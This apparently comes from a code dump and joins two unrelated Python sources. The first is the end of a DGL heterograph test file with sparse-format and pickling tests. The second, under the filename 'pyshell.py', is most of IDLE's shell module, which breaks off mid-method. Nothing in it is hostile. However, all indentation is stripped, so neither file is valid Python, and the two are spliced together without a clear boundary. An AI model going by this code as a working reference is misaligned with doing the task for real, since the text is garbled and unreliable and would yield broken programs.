assert np.array_equal(F.asnumpy(indices), A_csr.indices)
else:
indices_sorted = F.zeros(len(indices), idtype)
indices_sorted = F.scatter_row(indices_sorted, eids, indices)
indices_sorted_np = np.zeros(len(indices), dtype=A_csr.indices.dtype)
indices_sorted_np[A_csr.data] = A_csr.indices
assert np.array_equal(F.asnumpy(indices_sorted), indices_sorted_np)
indptr, indices, eids = g.adj_sparse('csc')
assert np.array_equal(F.asnumpy(indptr), A_csc.indptr)
if fmt == 'csc':
assert len(eids) == 0
assert np.array_equal(F.asnumpy(indices), A_csc.indices)
else:
indices_sorted = F.zeros(len(indices), idtype)
indices_sorted = F.scatter_row(indices_sorted, eids, indices)
indices_sorted_np = np.zeros(len(indices), dtype=A_csc.indices.dtype)
indices_sorted_np[A_csc.data] = A_csc.indices
assert np.array_equal(F.asnumpy(indices_sorted), indices_sorted_np)
def _test_forking_pickler_entry(g, q):
q.put(g.formats())
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="MXNet doesn't support spawning")
def test_forking_pickler():
ctx = mp.get_context('spawn')
g = dgl.graph(([0,1,2],[1,2,3]))
g.create_formats_()
q = ctx.Queue(1)
proc = ctx.Process(target=_test_forking_pickler_entry, args=(g, q))
proc.start()
fmt = q.get()['created']
proc.join()
assert 'coo' in fmt
assert 'csr' in fmt
assert 'csc' in fmt
if __name__ == '__main__':
# test_create()
# test_query()
# test_hypersparse()
# test_adj("int32")
# test_inc()
# test_view("int32")
# test_view1("int32")
# test_flatten(F.int32)
# test_convert_bound()
# test_convert()
# test_to_device("int32")
# test_transform("int32")
# test_subgraph("int32")
# test_subgraph_mask("int32")
# test_apply()
# test_level1()
# test_level2()
# test_updates()
# test_backward()
# test_empty_heterograph('int32')
# test_types_in_function()
# test_stack_reduce()
# test_isolated_ntype()
# test_bipartite()
# test_dtype_cast()
# test_float_cast()
# test_reverse("int32")
# test_format()
#test_add_edges(F.int32)
#test_add_nodes(F.int32)
#test_remove_edges(F.int32)
#test_remove_nodes(F.int32)
#test_clone(F.int32)
#test_frame(F.int32)
#test_frame_device(F.int32)
#test_empty_query(F.int32)
#test_create_block(F.int32)
pass
|
pyshell.py
|
#! /usr/bin/env python3
import sys
if __name__ == "__main__":
sys.modules['idlelib.pyshell'] = sys.modules['__main__']
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
try:
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1 # Int required.
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (ImportError, AttributeError, OSError):
pass
from tkinter import messagebox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
messagebox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
from textwrap import TextWrapper
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, StdInputFile, StdOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
#TODO: don't read/write this from/to .idlerc when testing
self.breakpointPath = os.path.join(
idleConf.userdir, 'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
messagebox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
def restart_line(width, filename): # See bpo-38141.
"""Return width long restart line formatted with filename.
Fill line with balanced '='s, with any extras and at least one at
the beginning. Do not end with a trailing space.
"""
tag = f"= RESTART: {filename or 'Shell'} ="
if width >= len(tag):
div, mod = divmod((width -len(tag)), 2)
return f"{(div+mod)*'='}{tag}{div*'='}"
else:
return tag[:-2] # Remove ' ='.
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except TimeoutError:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except TimeoutError:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
console.write('\n')
console.write(restart_line(console.width, filename))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
if use_subprocess:
source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
+ source + "\ndel __file__")
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if messagebox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
messagebox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
messagebox.showerror(
"Subprocess Connection Error",
"IDLE's subprocess didn't make connection.\n"
"See the 'Startup failure' section of the IDLE doc, online at\n"
"https://docs.python.org/3/library/idle.html#startup-failure",
parent=self.tkconsole.text)
def display_executing_dialog(self):
messagebox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "IDLE Shell " + python_version()
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
# Extend right-click context menu
rmenu_specs = OutputWindow.rmenu_specs + [
("Squeeze", "<<squeeze-current-text>>"),
]
allow_line_numbers = False
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
self.prompt_last_line = self.sys_ps1.split('\n')[-1]
self.prompt = self.sys_ps1 # Changes when debug active
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
squeezer = self.Squeezer(self)
text.bind("<<squeeze-current-text>>",
squeezer.squeeze_current_text_event)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = StdInputFile(self, "stdin",
iomenu.encoding, iomenu.errors)
self.stdout = StdOutputFile(self, "stdout",
iomenu.encoding, iomenu.errors)
self.stderr = StdOutputFile(self, "stderr",
iomenu.encoding, "backslashreplace")
self.console = StdOutputFile(self, "console",
iomenu.encoding, iomenu.errors)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
messagebox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
self.prompt = self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
self.prompt = "[DEBUG ON]\n" + self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = True
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = False
self.canceled = False
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = messagebox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
# User code should use separate default Tk root window
import tkinter
tkinter._support_default_root = True
tkinter._default_root = None
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = True
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = False
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = False
self.canceled = True
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = False
self.endoffile = True
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
